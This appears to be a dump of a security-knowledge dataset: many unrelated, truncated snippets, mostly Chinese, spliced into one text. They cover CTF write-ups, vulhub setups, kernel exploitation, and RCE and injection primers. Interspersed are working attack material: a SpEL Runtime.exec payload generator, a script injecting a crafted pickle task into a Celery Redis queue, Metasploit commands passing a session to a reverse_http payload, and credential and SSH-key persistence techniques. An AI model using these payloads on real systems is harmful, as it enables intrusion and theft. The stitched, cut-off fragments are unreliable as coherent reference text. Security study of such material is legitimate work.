text
stringlengths
100
9.93M
category
stringclasses
11 values
# POP --- **相关文章 & Source & Reference** - [PHP对象注入之pop链构造](https://www.mi1k7ea.com/2019/05/04/PHP%E5%AF%B9%E8%B1%A1%E6%B3%A8%E5%85%A5%E4%B9%8Bpop%E9%93%BE%E6%9E%84%E9%80%A0/) - [萌新入门pop链](https://bkfish.gitee.io/2020/01/04/pop%E9%93%BE/) --- ## 什么是 POP 面向属性编程(Property-Oriented Programing) 用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编...
sec-knowleage
# bypass-smep ## SMEP 为了防止 `ret2usr` 攻击,内核开发者提出了 `smep` 保护,smep 全称 `Supervisor Mode Execution Protection`,是内核的一种保护措施,作用是当 CPU 处于 `ring0` 模式时,执行 `用户空间的代码` 会触发页错误;这个保护在 arm 中被称为 `PXN`。 通过 qemu 启动内核时的选项可以判断是否开启了 smep 保护。 ```bash CISCN2017_babydriver [master●●] grep smep ./boot.sh qemu-system-x86_64 -initrd rootfs.cpio -k...
sec-knowleage
### 2018 网鼎杯第一场 clip解析 通过010 editor 可以看到文件的头部包含有 cloop 字样,搜了搜发现这是一个古老的 linux 压缩后的设备,题目中又说这个设备损坏了,所以就想办法找一个正常的。于是搜索如何压缩得到一个 cloop 文件,如下 ```shell mkisofs -r test | create_compressed_fs - 65536 > test.cloop ``` 参考https://github.com/KlausKnopper/cloop,于是压缩一个文件,然后发现源文件文件头存在问题,于是进行修复,从而考虑如何从 cloop 文件中提取文件,即使用 ``` extract_com...
sec-knowleage
version: '2' services: flink: image: vulhub/flink:1.11.2 command: jobmanager ports: - "8081:8081" - "6123:6123"
sec-knowleage
version: '2' services: php: image: php:7.2-apache volumes: - ./www:/var/www/html ports: - "8080:80"
sec-knowleage
# https://www.ncbi.nlm.nih.gov/nuccore/HW306977.1/ s = """ atggagaaaa tagtrcttct tcttgcaata gtcagtcttg ttaaaagtga tcagatttgc attggttacc atgcaaacaa ttcaacagag caggttgaca caatcatgga aaagaacgtt actgttacac atgcccaaga catactggaa aagacacaca acgggaagct ctgcgatcta gatggagtga agcctctaat tttaagagat tgtagtgtag ctggatggct cctcggg...
sec-knowleage
# 0x00 MSF 转 CS 当我们的已经获得 meterpreter的时候转到CS只需要使用的`payload_inject`模块 ``` meterpreter > background [*] Backgrounding session 1... msf exploit(multi/handler) > use exploit/windows/local/payload_inject msf exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http payload => windows/meterpreter/r...
sec-knowleage
**Authors**: < [nixawk](https://github.com/nixawk) > ---- ## Passwords in SYSVOL & Group Policy Preferences This method is the simplest since no special “hacking” tool is required. All the attacker has to do is open up Windows explorer and search the domain SYSVOL DFS share for XML files. Most of the time, the followin...
sec-knowleage
# Memory (forensics 100) ###ENG [PL](#pl-version) In the task we get a memdump (quite large so we won't add it here). We proceed with the analysis using volatility. If we check connections we can see that there is only one: ``` $ ./volatility-2.5.standalone.exe connections -f forensic_100.raw Volatility Foundation Vola...
sec-knowleage
### Kernel ROP概述 ROP即```返回导向编程```(Return-oriented programming),应当是大家比较熟悉的一种攻击方式——通过复用代码片段的方式控制程序执行流。 **内核态的 ROP 与用户态的 ROP 一般无二,只不过利用的 gadget 变成了内核中的 gadget,所需要构造执行的 ropchain 由** `system("/bin/sh")` **变为了** `commit_creds(&init_cred)` 或 `commit_creds(prepare_kernel_cred(NULL))`,当我们成功地在内核中执行这样的代码后,当前线程的 cred 结构体便变为 init 进...
sec-knowleage
# Intro Our entry point is a 2-minute [YouTube Video](https://youtu.be/KdBf-wvEaCM) which contains a [Shofar blowing](https://en.wikipedia.org/wiki/Shofar_blowing) - a religious ritual which consists of blowing a horn for short and long blasts. Translated to the world of CTFs, this usually means either binary encoding ...
sec-knowleage
* [面试问题记录](#面试问题记录) * [360](#360) * [SQL的存储引擎](#sql的存储引擎) * [SQL注入写shell的条件,用法](#sql注入写shell的条件用法) * [GPC是什么?开启了怎么绕过](#gpc是什么开启了怎么绕过) * [Mysql一个@和两个@什么区别](#mysql一个和两个什么区别) * [IIS解析漏洞,不同版本有什么漏洞,还有什么容器解析漏洞](#iis解析漏洞不同版本有什么漏洞还有什么容器解析漏洞) * [wireshark抓包,数据报经过三层交换机、...
sec-knowleage
'\" '\" Copyright (c) 1990-1994 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: bgerror.n,v 1.2 2003/11/24 05...
sec-knowleage
# Apache APISIX Dashboard Unauthenticated Access Leads to RCE (CVE-2021-45232) [中文版本(Chinese version)](README.zh-cn.md) Apache APISIX is a dynamic, real-time, high-performance API gateway, and Apache APISIX Dashboard is a easy to use frontend interface that is used to manage the Apache APISIX. In Apache APISIX Dashb...
sec-knowleage
## Webpack环境配置 ### 创建并进入一个文件夹wepback: ``` mkdir webpack && cd webpack ``` ### 在webpack中创建一个src -> index.js ``` mkdir src && touch src/index.js ``` ### 初始化项目: npm init这会提示你关于项目的更多细节,并创建一个 package.json 文件。 使用 -y 标记表示你能接受 package.json 文件的一堆: ``` npm init -y ``` **注意**:项目名不要和包名相同,否则可能会出错误。 ### 如果项目名和包名相同,修改Webpack -> pac...
sec-knowleage
# T1098-004-linux-账户操纵-SSH Authorized Keys ## 来自ATT&CK的描述 攻击者可能会修改SSH `authorized_keys`文件来维持对目标主机的持久访问。 Linux发行版和macOS通常会对远程管理的SSH会话采用基于密钥的身份验证过程。SSH中的`authorized_keys`文件指定了登录用户账户(该文件就是为此账户而配置)需要用到的SSH密钥。此文件通常位于用户home目录中的`<user-home>/.ssh/authorized_keys`下(引自:SSH Authorized Keys)。用户可能会编辑系统的SSH配置文件,将PubkeyAuthentication...
sec-knowleage
## 一、 什么是同源策略 ## 同源策略是浏览器上为安全性考虑实施的非常重要的安全策略,理解跨域首先必须要了解同源策略。 何谓同源:URL由协议、域名、端口和路径组成,如果两个URL的协议、域名和端口相同,则表示他们同源。 同源策略: > 浏览器的同源策略,限制了来自不同源的"document"或脚本,对当前"document"读取或设置某些属性。 (白帽子讲web安全) 从一个域上加载的脚本不允许访问或者设置另外一个域的文档属性。 举个例子: 比如一个恶意网站的页面通过iframe嵌入了银行的登录页面(二者不同源),如果没有同源限制,恶意网页上的javascript脚本就可以在用户登录银行的时候获取用户名...
sec-knowleage
.\" t .\" Don't change the first line, it tells man that tbl is needed. .\" This man page copyright 1998 by Andi Kleen. Subject to the GPL. .\" This manpage copyright 1998 by Andi Kleen. Subject to the GPL. .\" Based on the original comments from Alexey Kuznetsov .\" 中文版 Copyright (c) 2000 LetBright,BitBIRD 和 www.linux...
sec-knowleage
<!DOCTYPE html> <html> <head> <title>Hello WebSocket</title> <link href="/webjars/bootstrap/css/bootstrap.min.css" rel="stylesheet"> <link href="/main.css" rel="stylesheet"> <script src="/webjars/jquery/jquery.min.js"></script> <script src="/webjars/sockjs-client/sockjs.min.js"></script> <script...
sec-knowleage
'\" '\" Copyright (c) 1995-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: load.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" The definitions below are for supplemental macr...
sec-knowleage
htop === [非内部命令]一个互动的进程查看器,可以动态观察系统进程状况 ## 补充说明 htop命令 是Linux系统中的一个互动的进程查看器,一个文本模式的应用程序(在控制台或者X终端中),需要ncurses。 与Linux传统的top相比,htop更加人性化。它可让用户交互式操作,支持颜色主题,可横向或纵向滚动浏览进程列表,并支持鼠标操作。 与top相比,htop有以下优点: - 可以横向或纵向滚动浏览进程列表,以便看到所有的进程和完整的命令行。 - 在启动上,比top 更快。 - 杀进程时不需要输入进程号。 - htop 支持鼠标操作。 - 两者相比起来,top比较繁琐。 top缺点: - 只支持键盘操作。 - 显示也...
sec-knowleage
# upload-labs-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **靶场项目地址** - https://github.com/c0ny1/upload-labs **环境要求** - 操作系统: Window or Linux 推荐使用 Windows,除了 Pass-19 必须在 linux 下,其余 Pass 都可以在 Windows 上运行 - PHP 版本 : 推荐 5.2.17 其他版本可能会导致部分 Pass 无法突破 - PHP 组件 : php_gd2,php_exif 部分 Pass 依...
sec-knowleage
# Intentional Exercise - FLAG0 ## 0x00 App Home On app load, a request is sening to server and got an flag link. ![](./imgs/home.jpg) However, the result shows invalid request ![](./imgs/invalid.jpg) ## 0x01 Mutate Request It is a practice to modify all the HTTP parameters you can reach. It seems always send the same l...
sec-knowleage
# T1190-Thinkphp 5.x远程命令执行漏洞检测 ## 来自ATT&CK的描述 使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。 如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。 对于网站和数据库,OWASP排名前1...
sec-knowleage
# Micro-CMS v2 - FLAG1 ## 0x00 Index ![](../flag0/imgs/index.jpg) ## 0x01 Edit Try edit page with normal user. ``` http://127.0.0.1:5001/xxxxxxxxxx/page/edit/1 ``` ### GET Also redirect to log in page. ![](./imgs/get.jpg) ### POST (FLAG) ![](./imgs/post.jpg)
sec-knowleage
package com.p020a.multicheck; import android.os.Bundle; import android.support.v7.app.C0326c; import android.view.View; import android.view.View.OnClickListener; import android.widget.EditText; import android.widget.Toast; import com.a.multicheck.R; import dalvik.system.DexClassLoader; import java.io.File; import java...
sec-knowleage
# Super Safe RSA 2 Cryptography, 425 points ## Description: > Wow, he made the exponent really large so the encryption MUST be safe, right?! ## Solution: After connecting to the server, we receive a response similar to the the following: ```console root@kali:/media/sf_CTFs/pico/Super_Safe_RSA_2# nc 2018shell3.picoctf....
sec-knowleage
# Kubernetes kubernetes,简称 K8s,是 Google 开源的一个容器编排引擎,它支持自动化部署、大规模可伸缩、应用容器化管理。在生产环境中部署一个应用程序时,通常要部署该应用的多个实例以便对应用请求进行负载均衡。 > 官网 : https://kubernetes.io/ > Fofa : app="kubernetes" **kubectl使用** - [kubectl](../../../../Integrated/Linux/Power-Linux.md#kubectl) **相关文章** - [K8s安全入门学习扫盲贴](https://tttang.com/archive/1465/) - [云安...
sec-knowleage
# T1027-004-win-基于白名单Csc.exe执行payload ## 来自ATT&CK的描述 许多软件开发相关的实用程序可用于执行各种形式的代码用于协助开发、调试和逆向工程。这些实用程序通常可以使用合法证书进行签名。签名后,它们就可以在系统上执行。通过可信的进程代理执行恶意代码,从而有效地绕过应用白名单防御解决方案。 ## 测试案例 C#的在Windows平台下的编译器名称是Csc.exe,如果你的.NET FrameWork SDK安装在C盘,那么你可以在C:\WINNT\Microsoft.NET\Framework\xxxxx目录中发现它。为了使用方便,你可以手动把这个目录添加到Path环境变量中去。用Csc.ex...
sec-knowleage
# scrapyd 未授权访问漏洞 scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。 参考链接:<https://www.leavesongs.com/PENETRATION/attack-scrapy.html> ## 环境搭建 执行如下命令启动scrapyd服务: ``` docker compose up -d ``` 环境启动后,访问`http://your-ip:6800`即可看到Web界面。 ## 漏洞复现 参考[攻击Scrapyd爬虫](https://www.le...
sec-knowleage
#!/usr/bin/python from __future__ import print_function import socket,ssl from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer from websocket import create_connection, WebSocket from urlparse import parse_qs import argparse import os LOOP_BACK_PORT_NUMBER = 8000 def FuzzWebSocket(fuzz_value): print(fuzz_v...
sec-knowleage
# Violator > https://download.vulnhub.com/violator/violator.ova 靶场IP:`192.168.32.194` 扫描对外端口 ``` ─(root💀kali)-[/tmp] └─# nmap -p 1-65535 -sV 192.168.32.194 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-04 23:22 EDT Nmap scan report for 192.168.32.194 Host is up (0.00067s latency). Not shown: 65533 closed tcp por...
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: join.n,v 1.2 2003/11/24 05:09:59 b...
sec-knowleage
# S2-008 远程代码执行漏洞 影响版本: 2.1.0 - 2.3.1 漏洞详情: http://struts.apache.org/docs/s2-008.html ## 测试环境搭建 ``` docker compose build docker compose up -d ``` ## 原理 参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html > S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat...
sec-knowleage
col === 过滤控制字符 ## 补充说明 **col命令** 是一个标准输入文本过滤器,它从标注输入设备读取文本内容,并把内容显示到标注输出设备。在许多UNIX说明文件里,都有RLF控制字符。当我们运用shell特殊字符`>`和`>>`,把说明文件的内容输出成纯文本文件时,控制字符会变成乱码,col命令则能有效滤除这些控制字符。 ### 语法 ```shell col(选项) ``` ### 选项 ```shell -b:过滤掉所有的控制字符,包括RLF和HRLF; -f:滤掉RLF字符,但允许将HRLF字符呈现出来; -x:以多个空格字符来表示跳格字符; -l<缓冲区列数>:预设的内存缓冲区有128列,用户可以自行指定缓冲区的...
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: unset.n,v 1.2 2003/11/24 05:10:00 ...
sec-knowleage
# Imagemagick Command Injection Vulnerability (CVE-2016–3714) [中文版本(Chinese version)](README.zh-cn.md) ImageMagick is a free and open-source cross-platform software suite for displaying, creating, converting, modifying, and editing raster images. Referers: - https://imagetragick.com - https://www.leavesongs.com/PEN...
sec-knowleage
# 0x00 order by 注入 这是一种特殊的注入 sql语句为 `select * from admin order by $id` 我们一般用order by 来判断他的列数,其实他就是一个依照第几个列来排序的过程。 order by注入是不能 直接使用`and 1=1` 来判断的,他需要用到条件语句。 ``` mysql> select * from admin order by id; +------+----------+----------+ | id | username | password | +------+----------+----------+ | 1 | cdmin | bdm...
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: if.n,v 1.2 2003/11/24 05:09:59 bbb...
sec-knowleage
import zlib, itertools, binascii s=[] q=open("blobs","rb").read().split("\n")[:-1] for w in q: w=w.split("'")[1] s.append(binascii.unhexlify(w)) print len(s) i=0 for perm in itertools.permutations(s): w="".join(perm) try: q=zlib.decompress(w) print perm except: pass i+=...
sec-knowleage
# T1176-浏览器扩展 ## 来自ATT&CK的描述 攻击者可能会滥用互联网浏览器扩展来建立对目标组织系统的持久性访问。浏览器扩展或插件是一些小程序,可以增加功能并定制互联网浏览器的各个方面。它们可以直接安装,也可以通过浏览器的应用商店安装,一般来说,它们对浏览器可以访问的一切都有访问权权限。 恶意扩展可以通过伪装成合法的扩展在应用商店下载,通过社会工程,或由已经入侵系统的攻击者安装到浏览器。浏览器应用商店的安全性可能是有限的,因此恶意扩展很容易打败自动扫描器。根据浏览器的情况,攻击者还可能操纵扩展的更新网址,从攻击者控制的服务器上安装更新,或操纵移动配置文件,悄悄地安装额外的扩展。 在 macOS 11 之前,攻击者可以通过命...
sec-knowleage
### Randomness概述 讨论以太坊中的随机数问题。由于所有以太坊节点在验证交易时,需要计算出相同的结果以达成共识,因此 EVM 本身无法实现真随机数的功能。至于伪随机数,其熵源也是只能是确定值。下面讨论各种随机数的安全性,并介绍回滚攻击。 ### 使用私有变量的伪随机数原理 合约使用外界未知的私有变量参与随机数生成。虽然变量是私有的,无法通过另一合约访问,但是变量储存进 storage 之后仍然是公开的。我们可以使用区块链浏览器(如 etherscan)观察 storage 变动情况,或者计算变量储存的位置并使用 Web3 的 api 获得私有变量值,然后计算得到随机数。 ### 使用私有变量的伪随机数例子 ```soli...
sec-knowleage
# exploit-exercises Nebula walkthrough #### Site: https://exploit-exercises.com/nebula http://vulnhub.com/entry/exploit-exercises-nebula-v5,31/ #### About Nebula takes the participant through a variety of common (and less than common) weaknesses and vulnerabilities in Linux. It takes a look at SUID files ...
sec-knowleage
# Bookhub (web, 19 solved, 208p) ``` How to pwn bookhub? http://52.52.4.252:8080/ hint: www.zip ``` In the task we get access to a webpage which displays some books information. There is also `admin login` page, but doesn't seem to be vulnerable in any way. We also get the [source code](www.zip). From the whole source ...
sec-knowleage
import pickle import json import base64 import redis import sys r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0) queue_name = 'default' ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, ...
sec-knowleage
# Level19 #### About There is a flaw in the below program in how it operates. To do this level, log in as the level19 account with the password level19. Files for this level can be found in /home/flag19. #### Source code ``` #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <...
sec-knowleage
# number_place (misc 150) ###ENG [PL](#pl-version) In the task we get hint about sudoku and address of remote server which sends us inputs in form: ``` .418.5..9..9.7..58.3............26..3...6..25...5...97.....69.2.1..4......7...... ``` It's quite clear that this is definition of sudoku grid and we need to solve it to...
sec-knowleage
# CGC 超级挑战赛 > 本节内容摘自李康教授于 2016 年 8 月 17 日 ISC 互联网安全大会演讲《网络超级挑战赛中的漏洞发掘与利用》。 CGC 网络超级挑战赛是全球首次机器网络攻防比赛,比赛过程全自动,无任何人工干预。考验机器自动漏洞挖掘、自动软件加固、自动漏洞利用和自动网络防护水平。使用简化的 Linux 操作系统------DECREE,类似 Snort的规则过滤防火墙。对 Linux 二进制程序进行漏洞挖掘。所有参赛队都没有程序源码。 在 2016 年的 CGC 比赛中,挑战的赛题包含了 53 种 CWE。其中包含 28 个堆溢出漏洞、24 个栈溢出漏洞、16 个空指针访问漏洞、13 个整数溢出漏洞和 8 个 U...
sec-knowleage
#!/usr/bin/env python message = input('Enter message to encode:') poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0]) for ch in message[1:]: poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch) poc += ')}' print(poc)
sec-knowleage
# SoSimple > https://download.vulnhub.com/sosimple/So-Simple-1.7z 靶场IP:`192.168.2.19` 扫描对外端口服务 ``` ┌──(root㉿kali)-[~/Desktop] └─# nmap -p1-65535 -sV 192.168.2.19 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-12 11:03 EDT Nmap scan report for 192.168.2.19 Host is up (0.00029s latency). Not shown: 65533 closed tcp p...
sec-knowleage
.TH SETSERIAL 8 "1998年9月" "Setserial 2.15 .SH NAME setserial \- 取得/设置 Linux 串行口的信息 .SH 总览 .B setserial .B "[ \-abqvVWZ]" 设备 .BR "[ "命令参数一 " [ " 设备变元参数 " ] ] ..." .B "setserial -g" .B "[\a-abGv ]" 设备一 ... .SH 描述 .B setserial 是一个用来设置和取得与一个串行口有关的信息与设置的程序。这些信 息包括某个串行口正在使用的I/o地址与中断号,以及break键是否被当 做引起安全注意的键,等等。 在通常的引导的过程中,只有...
sec-knowleage
### 程序执行基本操作说明sys_execve 该函数主要用于执行一个新的程序,即执行我们想要执行的程序,会检查相应的argv以及envp等参数。 ### 程序执行基本操作说明do_execve 该函数打开目标映像文件,并从目标文件的开始处读入指定长度的(目前为128)字节来获取相应目标文件的基本信息。 ### 程序执行基本操作说明search_binary_handler 该函数会搜索支持处理当前类型的二进制文件类型队列,以便于让各种可执行程序的处理程序进行相应的处理。 ### 程序执行基本操作说明load_elf_binary 该函数的主要处理流程如下 - 检查并获取elf文件的头部信息。 - 如果目标文件采用动态链接,则使用...
sec-knowleage
# 理解企业安全运营中的威胁交换 我们先理解对于情报驱动安全的体系中,整体的过程为:数据——信息——情报——策略。从中我们可以看到,我们要实施的威胁交换是在情报阶段及之前进行的。现阶段我的理解,主要是从时间维度(纵向)和参与角色(横向)来看。 ## 从纵向来看 从威胁检测的纵向(即按时间纬度)去考虑威胁交换的话,我们的工作主要集中于:“数据——信息——情报” 这个发展的过程。在这个纵向的过程中,我们要进行威胁交换,就是要做到以下几点: - 数据的交换 - 信息的交换 - 情报的交换 再细致地来讲,可以细分为: - 数据的交换 - 数据在采集前的交换:关于安全基线的配置、管理问题 - 数据在采集...
sec-knowleage
# 算法 - 算法分析 <!-- GFM-TOC --> * [算法 - 算法分析](#算法---算法分析) * [数学模型](#数学模型) * [1. 近似](#1-近似) * [2. 增长数量级](#2-增长数量级) * [3. 内循环](#3-内循环) * [4. 成本模型](#4-成本模型) * [注意事项](#注意事项) * [1. 大常数](#1-大常数) * [2. 缓存](#2-缓存) * [3. 对最坏情况下的性能的保证](#3-对最坏情况下的性能的保证) * [4. 随机...
sec-knowleage
### 常见加密算法和编码识别概述 在对数据进行变换的过程中,除了简单的字节操作之外,还会使用一些常用的编码加密算法,因此如果能够快速识别出对应的编码或者加密算法,就能更快的分析出整个完整的算法。CTF 逆向中通常出现的加密算法包括base64、TEA、AES、RC4、MD5等。 ### Base64概述 Base64 是一种基于64个可打印字符来表示二进制数据的表示方法。转换的时候,将3字节的数据,先后放入一个24位的缓冲区中,先来的字节占高位。数据不足3字节的话,于缓冲器中剩下的比特用0补足。每次取出6比特,按照其值选择`ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz01...
sec-knowleage
# SQL injection ## Introduction It is an attack in which an attacker inserts untrusted data in the application that results in revealing sensitive information of the database. SQL Injection (SQLi) is a code injection attack where an attacker manipulates the data being sent to the server to execute malicious SQL state...
sec-knowleage
## Hack By The Sound (Misc, 200p) A well known blogger has came to a hotel that we had good relationships with its staffs. We tried to capture the sound of his room by placing a microphone inside the desk. We have recorded the sound about the time that he has typed a text in his blogg. You could find the text h...
sec-knowleage
# Command Injection > Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. ## Summary * [Tools](#tools) * [Exploits](#exploits) * [Basic commands](#basic-commands) * [Chaining commands](#chaining-commands) * [Inside a command](#inside...
sec-knowleage
# Tabnabbing > Reverse tabnabbing is an attack where a page linked from the target page is able to rewrite that page, for example to replace it with a phishing site. As the user was originally on the correct page they are less likely to notice that it has been changed to a phishing site, especially if the site looks th...
sec-knowleage
# Common Vulnerabilities and Exposures ## Tools - [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve) - [Nuclei Templates - Community curated list of templates for the nuclei engine to find security vulnerabilities in applications](https://github.com/projectdiscovery/nucl...
sec-knowleage
.TH ScrollableFrame 3tk "tcllib - BWidget" .SH NAME .B ScrollableFrame - 包含组件的可滚动的框架 .SH 创建 CREATION .B ScrollableFrame pathName ?option value...? .SH 描述 DESCRIPTION ScrollableFrame 组件包含组件。 .SH 组件特有选项 WIDGET-SPECIFIC OPTIONS .TP -areaheight 为可滚动区域指定高度。如果是 zero,则使可滚动区域的高度刚好足够大得持有它的所有子窗口。 .TP -areawidth 为可滚动区域指定宽度。如...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "CREATE SEQUENCE" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME CREATE SEQUENCE \- 创建一个新的序列发生器 .SH SYNOPSIS .sp .nf CREATE [ TEMPORARY | TEMP ] SEQUENCE \fIname\fR [ INCREMENT [ BY ] \fIincrement\fR ] [ MINVALUE \fIminvalue\fR | NO M...
sec-knowleage
# libssh Authentication Bypass Vulnerability(CVE-2018-10933) [中文版本(Chinese version)](README.zh-cn.md) libssh is a multiplatform C library implementing the SSHv2 protocol on client and server side. A logic vulnerability was found in libssh's server-side state machine. The attacker can send the `MSG_USERAUTH_SUCCESS` m...
sec-knowleage
telnet === 登录远程主机和管理(测试ip端口是否连通) ## 补充说明 **telnet命令** 用于登录远程主机,对远程主机进行管理。telnet因为采用明文传送报文,安全性不好,很多Linux服务器都不开放telnet服务,而改用更安全的ssh方式了。但仍然有很多别的系统可能采用了telnet方式来提供远程登录,因此弄清楚telnet客户端的使用方式仍是很有必要的。 ### 语法 ```shell telnet(选项)(参数) ``` ### 选项 ```shell -8:允许使用8位字符资料,包括输入与输出; -a:尝试自动登入远端系统; -b<主机别名>:使用别名指定远端主机名称; -c:不读取用户专属目录里的.t...
sec-knowleage
# T1552-004-linux-私钥 ## 来自ATT&CK的描述 攻击者可以从被入侵的系统上收集私钥,用于对SSH等远程服务进行身份验证(暴力破解等),或者用于解密其他收集的文件,如电子邮件。通用密钥和证书文件扩展名包括:.key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. ;攻击者还可以查看常见的密钥目录,例如基于linux/unix的系统下的~/.ssh目录或Windows 上的SSH密钥C:\Users(username).ssh\。 私钥应该需要密码来进行操作,因此攻击者也可以使用键盘记录获取密码或尝试离线爆破账号密码。 ## 测试案例 find / ...
sec-knowleage
# JS rocks Category: Web ## Description > Part 1 of Imperva's challenge > > Put your JavaScript to the test, can you find the flag? > ## Solution We enter the attached website and are greeted with a login form: ```html <div class="container h-100"> <div class="row h-100 justify-content-center align-items-center"> ...
sec-knowleage
# OAuth Misconfiguration ## Introduction The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the vict...
sec-knowleage
**Tunna简介:** Tunna1.1 是 secforce 在2014年11月出品的一款基于HTTP隧道工具。其中v1.1中支持了SOCKS4a。 Tunna演示稿: https://drive.google.com/open?id=1PpB8_ks93isCaQMEUFf_cNvbDsBcsWzE Github: https://github.com/SECFORCE/Tunna **攻击机:** 192.168.1.5 Debian 192.168.1.4 Windows 7 **靶机:** 192.168.1.119 Windows 2003 **安装:** ```bash root@John:~...
sec-knowleage
--- title: acccheck categories: Password Attacks tags: [passwords,kali linux,acccheck,infogathering,password attack,smb,information gathering] date: 2016-10-18 11:10:00 --- 0x00 acccheck介绍 ------------- CDPSnarf(Cisco Discovery Protocol Sniffer)是专门用于从CDP包提取信息的网络嗅探器。 工具来源:https://labs.portcullis.co.uk/tools/acccheck/ [...
sec-knowleage
.TH SUBST 1 local "25 Feb 1990" .SH NAME subst \- 替换文件中的定义 .SH "总览 (SYNOPSIS)" .B subst [ .B \-e editor ] .B \-f substitutions victim ... .SH "描述 (DESCRIPTION)" .I Subst 能够 替换 文件 的 内容, 适用于 针对 本地情况 定制 软件. 它 根据 .I substitutions 的 内容, 修改 每一个 .I victim 文件. .PP 在 .I substitutions 文件 中, 每个 替换说明(substitution) 占用 一行. 每一行 包含 两...
sec-knowleage
--- title: Github date: 2022-11-23 16:23:31.704787 background: bg-[#17191e] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 80 keyboard shortcuts found on Github.com --- Keyboard Shortcuts ------------------ ### Site wide shortcuts Shortcut | Action ---|--- `S...
sec-knowleage
from Crypto.Util.number import * from gmpy import * def gen_prime(nbit): while True: prime = getPrime(nbit) if prime % 3 == 2: return prime def add(a, b, n): if a == 0: return b if b == 0: return a l = ((b[1] - a[1]) * invert(b[0] - a[0], n)) % n x = (l*l - a[0] - b[0]) % n ...
sec-knowleage
version: '2' services: activemq: image: vulhub/activemq:5.11.1 ports: - "61616:61616" - "8161:8161"
sec-knowleage
.TH ArrowButton 3tk "tcllib - BWidget" .SH NAME .B ArrowButton \- 带有一个箭头形状的按钮组件。 .SH 创建 CREATION .B ArrowButton pathName ?option value...? .SH 描述 DESCRIPTION ArrowButton 根据 type 选项而可以有两种类型: 对 button 类型,它是在其上画 着一个箭头的一个标准按钮;对于 arrow 类型,它是象滚动条的箭头那样的一个 箭头。 .SH 组件特有选项 WIDGET-SPECIFIC OPTIONS .TP -armcommand 指定当在 ArrowButton...
sec-knowleage
### Interrupt 3概述 无论何时触发了一个软件中断异常, 异常地址以及EIP寄存器的值都会同时指向产生异常的下一句指令. 但断点异常是其中的一个特例. 当`EXCEPTION_BREAKPOINT(0x80000003)`异常触发时, Windows会认定这是由单字节的"`CC`"操作码(也即`Int 3`指令)造成的. Windows递减异常地址以指向所认定的"`CC`"操作码, 随后传递该异常给异常处理句柄. 但是EIP寄存器的值并不会发生变化. 因此, 如果使用了 `CD 03`(这是 `Int 03` 的机器码表示),那么当异常处理句柄接受控制时, 异常地址是指向 `03` 的位置.
sec-knowleage
lynx === 纯文本模式的网页浏览器 ## 补充说明 **lynx命令** 是纯文本模式的网页浏览器,不支持图形、音视频等多媒体信息。 ### 语法 ```shell lynx(选项)(参数) ``` ### 选项 ```shell -case:在搜索字符串时,区分大小写; -ftp:关闭ftp功能; -nobrowse:关闭目录浏览功能; -noclor:关闭色彩显示模式; -reload:更新代理服务器的缓存,只对首页有效; --color:如果系统支持彩色模式,则激活彩色模式; --help:显示指令的帮助信息; --versiom:显示指令的版本信息。 ``` ### 参数 URL:指定要访问的网站的URL地址。 ...
sec-knowleage
